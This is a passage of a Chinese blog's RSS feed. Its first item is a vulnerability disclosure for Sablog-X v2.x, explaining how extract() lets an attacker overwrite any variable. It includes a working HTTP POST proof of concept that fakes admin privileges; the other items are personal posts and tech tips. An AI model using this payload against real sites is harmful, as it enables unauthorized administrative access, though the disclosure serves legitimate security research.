		<description><![CDATA[author: 80vul-B
team:http://www.80vul.com
一 描叙：
由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。
二 分析
common.inc.php代码里：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
....
$onoff = function_exists&#40;'ini_get'&#41; ? ini_get&#40;'register_globals'&#41; : get_cfg_var&#40;'register_globals'&#41;;
if &#40;$onoff != 1&#41; &#123;
	@extract&#40;$_COOKIE, EXTR_SKIP&#41;;
	@extract&#40;$_POST, EXTR_SKIP&#41;;
	@extract&#40;$_GET, EXTR_SKIP&#41;;
&#125;
...
$sax_auth_key = md5&#40;$onlineip.$_SERVER&#91;'HTTP_USER_AGENT'&#93;&#41;;
list&#40;$sax_uid, $sax_pw, $sax_logincount&#41; = $_COOKIE&#91;'sax_auth'&#93; ? explode&#40;&#34;\t&#34;, authcode&#40;$_COOKIE&#91;'sax_auth'&#93;, 'DECODE'&#41;&#41; : array&#40;'', '', ''&#41;;
$sax_hash = sax_addslashes&#40;$_COOKIE&#91;'sax_hash'&#93;&#41;;
...
$seccode = $sessionexists = 0;
if &#40;$sax_hash&#41; &#123;
...
	if &#40;$_EVO = $DB-&#62;fetch_array&#40;$query&#41;&#41;&#123; //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。
...
&#125;
if&#40;!$sessionexists&#41; &#123;
	if&#40;$sax_uid&#41; &#123;
		if&#40;!&#40;$_EVO = $DB-&#62;fetch_one_array&#40;&#34;SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' [...]]]></description>
			<content:encoded><![CDATA[<p>author: 80vul-B<br />
team:http://www.80vul.com</p>
<p>一 描叙：</p>
<p>由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。</p>
<p>二 分析</p>
<p>common.inc.php代码里：</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">....</span>
<span style="color: #000088;">$onoff</span> <span style="color: #339933;">=</span> <span style="color: #990000;">function_exists</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'ini_get'</span><span style="color: #009900;">&#41;</span> ? <span style="color: #990000;">ini_get</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'register_globals'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <span style="color: #990000;">get_cfg_var</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'register_globals'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$onoff</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	<span style="color: #339933;">@</span><span style="color: #990000;">extract</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #339933;">,</span> EXTR_SKIP<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #339933;">@</span><span style="color: #990000;">extract</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #339933;">,</span> EXTR_SKIP<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #339933;">@</span><span style="color: #990000;">extract</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_GET</span><span style="color: #339933;">,</span> EXTR_SKIP<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #339933;">...</span>
<span style="color: #000088;">$sax_auth_key</span> <span style="color: #339933;">=</span> <span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$onlineip</span><span style="color: #339933;">.</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'HTTP_USER_AGENT'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">list</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$sax_uid</span><span style="color: #339933;">,</span> <span style="color: #000088;">$sax_pw</span><span style="color: #339933;">,</span> <span style="color: #000088;">$sax_logincount</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'sax_auth'</span><span style="color: #009900;">&#93;</span> ? <span style="color: #990000;">explode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;<span style="color: #000099; font-weight: bold;">\t</span>&quot;</span><span style="color: #339933;">,</span> authcode<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'sax_auth'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'DECODE'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <span style="color: #990000;">array</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">''</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">''</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">''</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$sax_hash</span> <span style="color: #339933;">=</span> sax_addslashes<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'sax_hash'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #339933;">...</span>
<span style="color: #000088;">$seccode</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$sessionexists</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$sax_hash</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #339933;">...</span>
	<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_EVO</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$DB</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">fetch_array</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$query</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #666666; font-style: italic;">//$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。</span>
<span style="color: #339933;">...</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #000088;">$sessionexists</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$sax_uid</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
		<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_EVO</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$DB</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">fetch_one_array</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;SELECT <span style="color: #006699; font-weight: bold;">$userfields</span> FROM <span style="color: #006699; font-weight: bold;">{$db_prefix}</span>users u WHERE u.userid='<span style="color: #006699; font-weight: bold;">$sax_uid</span>' AND u.password='<span style="color: #006699; font-weight: bold;">$sax_pw</span>' AND u.lastip='<span style="color: #006699; font-weight: bold;">$onlineip</span>'&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #339933;">...</span>
<span style="color: #339933;">@</span><span style="color: #990000;">extract</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_EVO</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//覆盖任意变量</span></pre></td></tr></table></div>

<p>由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)</p>
<p>三 利用</p>
<p>下面给个后台权限欺骗的PoC:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="code"><pre class="html" style="font-family:monospace;">POST http://127.0.0.1/sax/cp.php  HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close
&nbsp;
_EVO[sax_uid]=1&amp;_EVO[sax_pw]=1&amp;_EVO[sax_logincount]=1&amp;_EVO[sax_hash]=1&amp;_EVO[sax_group]=1&amp;_EVO[sax_auth_key]=1&amp;_EVO[timestamp]=111111111111</pre></td></tr></table></div>

<p>四 补丁[fix]</p>
<p>缺</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/" title="DEDECMS v5.5 Final select_soft_post.php 漏洞">DEDECMS v5.5 Final select_soft_post.php 漏洞</a></li><li><a href="http://www.lixiaopeng.org/dvbbs-php2-0-injection-vulnerability/" title="DVBBS php2.0 注入漏洞">DVBBS php2.0 注入漏洞</a></li><li><a href="http://www.lixiaopeng.org/linux-kernel-high-risk-vulnerability-a-command-directly-to-the-right/" title="Linux内核高危漏洞,一个命令直接提权">Linux内核高危漏洞,一个命令直接提权</a></li><li><a href="http://www.lixiaopeng.org/ewebeditor-v6-0-0-version-of-the-loopholes/" title="ewebeditor v6.0.0版本漏洞">ewebeditor v6.0.0版本漏洞</a></li><li><a href="http://www.lixiaopeng.org/two-loopholes-joekoe-cms-40-from-the-loopholes-injection/" title="joekoe CMS 4.0 两个漏洞(上传漏洞+注入)">joekoe CMS 4.0 两个漏洞(上传漏洞+注入)</a></li><li><a href="http://www.lixiaopeng.org/mall-ecshop-system-filters-lead-to-sql-injection-vulnerabilities-lax/" title="ECSHOP商城系统过滤不严导致SQL注入漏洞">ECSHOP商城系统过滤不严导致SQL注入漏洞</a></li><li><a href="http://www.lixiaopeng.org/dvbbs-showasp-strict-filtering-page-lead-to-cross-site-flaws/" title="动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞">动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞</a></li><li><a href="http://www.lixiaopeng.org/net-fun-fashion-online-shopping-system-into-the-v32-version-of-the-loopholes/" title="网趣网上购物系统时尚版 v3.2注入漏洞">网趣网上购物系统时尚版 v3.2注入漏洞</a></li><li><a href="http://www.lixiaopeng.org/do-not-underestimate-the-comment-out-of-js/" title="不要小看注释掉的JS">不要小看注释掉的JS</a></li><li><a href="http://www.lixiaopeng.org/apache-directory-browsing-vulnerability/" title="apache浏览目录漏洞">apache浏览目录漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/sablog-x-v2-x-arbitrary-variable-overwrite-vulnerability/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>新年快乐</title>
		<link>http://www.lixiaopeng.org/happy-new-year/</link>
		<comments>http://www.lixiaopeng.org/happy-new-year/#comments</comments>
		<pubDate>Sat, 13 Feb 2010 16:20:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[随笔]]></category>
		<category><![CDATA[新年]]></category>
		<category><![CDATA[虎年]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1345</guid>
		<description><![CDATA[祝大家新年快乐，虎年吉祥！
您可能对以下文章有兴趣↓No Related Post]]></description>
			<content:encoded><![CDATA[<p>祝大家新年快乐，虎年吉祥！</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/happy-new-year/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>自己做的干锅鸡</title>
		<link>http://www.lixiaopeng.org/own-chickens-do-ganguo/</link>
		<comments>http://www.lixiaopeng.org/own-chickens-do-ganguo/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 14:28:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[随笔]]></category>
		<category><![CDATA[chickens]]></category>
		<category><![CDATA[干锅]]></category>
		<category><![CDATA[干锅鸡]]></category>
		<category><![CDATA[鸡]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/own-chickens-do-ganguo/</guid>
		<description><![CDATA[嘿嘿，想吃肉了，晒晒我自己做的干锅鸡图片。
因为是晚上，光线不好，有的照片用手电筒照了一下，唉，破手机，拍的就是不行。。。


上面这两张是刚炒出来鸡块的时候，很麻辣哦。然后接着加工，加了香菜，蘑菇，木耳，大豆芽，芹菜芽，豆腐叶，芝麻，辣椒。。。边吃边加热，麻辣鲜香，红红的汤，红红的辣椒，绿色的香菜，黄色的大豆芽，黑色的木耳，白色的蘑菇，芝麻，豆腐叶，嘎，还有金黄色的肉。。。好吃啊！















您可能对以下文章有兴趣↓No Related Post]]></description>
			<content:encoded><![CDATA[<p>嘿嘿，想吃肉了，晒晒我自己做的干锅鸡图片。<br />
因为是晚上，光线不好，有的照片用手电筒照了一下，唉，破手机，拍的就是不行。。。</p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo1.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo1.jpg" alt="" title="own-chickens-do-ganguo1" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo2.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo2.jpg" alt="" title="own-chickens-do-ganguo2" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p>上面这两张是刚炒出来鸡块的时候，很麻辣哦。然后接着加工，加了香菜，蘑菇，木耳，大豆芽，芹菜芽，豆腐叶，芝麻，辣椒。。。边吃边加热，麻辣鲜香，红红的汤，红红的辣椒，绿色的香菜，黄色的大豆芽，黑色的木耳，白色的蘑菇，芝麻，豆腐叶，嘎，还有金黄色的肉。。。好吃啊！</p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo3.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo3.jpg" alt="" title="own-chickens-do-ganguo3" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo4.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo4.jpg" alt="" title="own-chickens-do-ganguo4" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo5.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo5.jpg" alt="" title="own-chickens-do-ganguo5" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo6.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo6.jpg" alt="" title="own-chickens-do-ganguo6" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo7.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo7.jpg" alt="" title="own-chickens-do-ganguo7" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo8.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo8.jpg" alt="" title="own-chickens-do-ganguo8" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo9.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo9.jpg" alt="" title="own-chickens-do-ganguo9" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo10.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo10.jpg" alt="" title="own-chickens-do-ganguo10" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo11.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo11.jpg" alt="" title="own-chickens-do-ganguo11" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo12.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo12.jpg" alt="" title="own-chickens-do-ganguo12" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo13.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo13.jpg" alt="" title="own-chickens-do-ganguo13" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo14.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo14.jpg" alt="" title="own-chickens-do-ganguo14" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo15.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo15.jpg" alt="" title="own-chickens-do-ganguo15" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo16.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo16.jpg" alt="" title="own-chickens-do-ganguo16" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo17.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2010/02/own-chickens-do-ganguo17.jpg" alt="" title="own-chickens-do-ganguo17" width="400" height="320" class="alignnone size-full wp-image-334" /></a></p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/own-chickens-do-ganguo/feed/</wfw:commentRss>
		<slash:comments>53</slash:comments>
		</item>
		<item>
		<title>ime-mode:disabled css实现关闭文本框输入法</title>
		<link>http://www.lixiaopeng.org/ime-mode-disabled-css-to-achieve-closure-of-the-text-box-input/</link>
		<comments>http://www.lixiaopeng.org/ime-mode-disabled-css-to-achieve-closure-of-the-text-box-input/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 22:26:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[CSS]]></category>
		<category><![CDATA[ime-mode]]></category>
		<category><![CDATA[输入法]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1323</guid>
		<description><![CDATA[ime-mode
语法：
ime-mode : auto &#124; active &#124; inactive &#124; disabled
取值：
auto	:	默认值。不影响IME的状态。与不指定 ime-mode 属性时相同
active	:	指定所有使用IME输入的字符。即激活本地语言输入法。用户仍可以撤销激活IME
inactive	:	指定所有不使用IME输入的字符。即激活非本地语言。用户仍可以撤销激活IME
disabled	:	完全禁用IME。对于有焦点的控件(如输入框)，用户不可以激活IME
您可能对以下文章有兴趣↓No Related Post]]></description>
			<content:encoded><![CDATA[<p>ime-mode<br />
语法：<br />
ime-mode : auto | active | inactive | disabled<br />
取值：<br />
auto	:	默认值。不影响IME的状态。与不指定 ime-mode 属性时相同<br />
active	:	指定所有使用IME输入的字符。即激活本地语言输入法。用户仍可以撤销激活IME<br />
inactive	:	指定所有不使用IME输入的字符。即激活非本地语言。用户仍可以撤销激活IME<br />
disabled	:	完全禁用IME。对于有焦点的控件(如输入框)，用户不可以激活IME</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/ime-mode-disabled-css-to-achieve-closure-of-the-text-box-input/feed/</wfw:commentRss>
		<slash:comments>53</slash:comments>
		</item>
		<item>
		<title>领证了</title>
		<link>http://www.lixiaopeng.org/receive-certificates-of/</link>
		<comments>http://www.lixiaopeng.org/receive-certificates-of/#comments</comments>
		<pubDate>Mon, 18 Jan 2010 13:13:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[随笔]]></category>
		<category><![CDATA[结婚]]></category>
		<category><![CDATA[结婚证]]></category>
		<category><![CDATA[领证]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/receive-certificates-of/</guid>
		<description><![CDATA[唉，结婚真累，本来想和老婆出去玩的，不过最近事好像特别多，搞的啥也玩不成了。。
今天去领证了，和想像中不同，服务态度不算好吧，一副爱理不理的样子，好像离婚的比结婚的多。。。
以前见过老爸老妈的是一张纸，现在拿到才知道是两个本本，一人一个。。。
两人合照一寸照片四张 20元
复印身份证 2元
结婚证手续费 9元
共销费31元。以后就不是单身了。。。已婚，好蛋疼的词。。。
最近处理婚后的锁事，把老婆的户口迁过来，接着学习冲电，努力工作赚钱。。
您可能对以下文章有兴趣↓No Related Post]]></description>
			<content:encoded><![CDATA[<p>唉，结婚真累，本来想和老婆出去玩的，不过最近事好像特别多，搞的啥也玩不成了。。<br />
今天去领证了，和想像中不同，服务态度不算好吧，一副爱理不理的样子，好像离婚的比结婚的多。。。<br />
以前见过老爸老妈的是一张纸，现在拿到才知道是两个本本，一人一个。。。<br />
两人合照一寸照片四张 20元<br />
复印身份证 2元<br />
结婚证手续费 9元<br />
共销费31元。以后就不是单身了。。。已婚，好蛋疼的词。。。<br />
最近处理婚后的锁事，把老婆的户口迁过来，接着学习冲电，努力工作赚钱。。</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/receive-certificates-of/feed/</wfw:commentRss>
		<slash:comments>156</slash:comments>
		</item>
		<item>
		<title>ubuntu自动挂载NTFS分区</title>
		<link>http://www.lixiaopeng.org/ubuntu-auto-mount-ntfs-partition/</link>
		<comments>http://www.lixiaopeng.org/ubuntu-auto-mount-ntfs-partition/#comments</comments>
		<pubDate>Sat, 26 Dec 2009 14:57:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[NTFS]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[自动挂载]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1320</guid>
		<description><![CDATA[唉，不自动加载的话，用起来相当的麻烦。以下方法很简单。。
sudo apt-get install ntfs-config
sudo ntfs-config
您可能对以下文章有兴趣↓Ubuntu常用软件,配置和命令]]></description>
			<content:encoded><![CDATA[<p>唉，不自动加载的话，用起来相当的麻烦。以下方法很简单。。</p>
<p>sudo apt-get install ntfs-config</p>
<p>sudo ntfs-config</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/ubuntu-commonly-used-software-configuration-and-order/" title="Ubuntu常用软件,配置和命令">Ubuntu常用软件,配置和命令</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/ubuntu-auto-mount-ntfs-partition/feed/</wfw:commentRss>
		<slash:comments>188</slash:comments>
		</item>
		<item>
		<title>国内域名注册服务停止对个人开放</title>
		<link>http://www.lixiaopeng.org/domestic-domain-name-registration-service-to-stop-individuals-with-access-to/</link>
		<comments>http://www.lixiaopeng.org/domestic-domain-name-registration-service-to-stop-individuals-with-access-to/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 05:54:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻]]></category>
		<category><![CDATA[GODADDY]]></category>
		<category><![CDATA[国内域名]]></category>
		<category><![CDATA[注册服务]]></category>
		<category><![CDATA[焦点访谈]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1315</guid>
		<description><![CDATA[来源:月光博客 http://www.williamlong.info/archives/2018.html
      FUCK,让人郁闷的消息,看来我转移到GODADDY是个正确的选择...
　　12月9日晚间，中央电视台《焦点访谈》就手机网络色情进行了系列访谈，晚间节目主题为《失控的域名》，指责工信部CNNIC对于域名的注册缺乏监管，域名注册服务过程中存在注册信息不真实、不准确、不完整的问题，要求其保证域名注册信息的真实性，严格执行实名制审查，并承担相应责任。
　　在遭到央视点名批评后，中国域名监管机构CNNIC处罚了三家域名注册服务及代理机构，并在官方网站接连发出数则加强域名注册信息审核工作的公告，而最新公告规定，从2009年12月14日上午9时起，个人用户没有资格进行域名注册。
　　该公告要求用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。个人用户由于无法提供企业营业执照或组织机构代码证，因此也没有资格进行域名注册。这也意味着，个人用户在未来将无法在国内注册包括COM、NET、CN等在内的所有域名。

　　对于个人网站用户来说，我以前就说过不要在国内注册域名，现在是彻底无法在国内注册了，中国的域名注册服务辛辛苦苦发展了十多年，现在一夜回到解放前，在广电的强势进攻之下，工信部可谓一败涂地，现在连个人用户都无法在国内进行域名注册了，互联网的发展历史性的倒退了。
　　这样的要求除了让个人网站更难注册域名之外，还减少CNNIC自身的业务，可谓损人不利己。现在已经不是十年前了，各大银行的个人信用卡业务已经茁壮发展起来了，只要申请一张国际信用卡，就可以轻松在国外网站进行域名注册，注册填写的信息更加难以监管和监控，CNNIC还失去了对这些域名的控制权。
　　因此，现在还在使用国内域名注册服务的个人网站，应该充分认识到这方面存在的巨大不确定风险，尽快将域名转到国外，例如美国的注册商。美国是法制国家，域名注册商绝对不会出卖客户的隐私信息的，也不会违规取消客户的域名。因此，在美国注册域名安全、可靠、实惠，总的来说远远优于在国内域名注册服务。具体操作可参见这篇“万网域名转出攻略”。
　　新注册的个人网站用户，由于国内已经不允许个人注册域名，因此只能在国外注册，注册可参见我这篇“在国外进行国际域名注册”的攻略。
　　没有信用卡的用户，可以寻找一些代购服务，让有信用卡的用户代购，也可以做一些国外的广告，将收入接收到自己的PayPal帐号，然后使用PayPal支付域名费用。
　　附：CNNIC关于进一步加强域名注册信息审核工作的公告
　　为了提升域名注册信息的真实性、准确性、完整性，进一步加强域名注册信息审核工作，现通知如下要求：
　　1、用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。
　　2、域名注册服务机构应当认真审核用户提交的书面申请材料，审核合格后，将书面申请材料通过传真或电子邮件的形式提交至我中心，并保留书面申请资料。
　　3、自域名提交在线申请之日起5日内我中心未收到书面申请材料的或域名申请材料审核不符合条件的，该域名将予以注销。
　　4、以上要求自2009年12月14日上午9时起施行。
　　中国互联网络信息中心　　2009年12月11日
您可能对以下文章有兴趣↓Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录关掉Godaddy自动续费域名lixiaopeng.org成功转入Godaddylixiaopeng.org申请转入GODADDY了]]></description>
			<content:encoded><![CDATA[<p>来源:月光博客 http://www.williamlong.info/archives/2018.html</p>
<p>      FUCK,让人郁闷的消息,看来我转移到GODADDY是个正确的选择...</p>
<p>　　12月9日晚间，中央电视台《焦点访谈》就手机网络色情进行了系列访谈，晚间节目主题为《失控的域名》，指责工信部CNNIC对于域名的注册缺乏监管，域名注册服务过程中存在注册信息不真实、不准确、不完整的问题，要求其保证域名注册信息的真实性，严格执行实名制审查，并承担相应责任。</p>
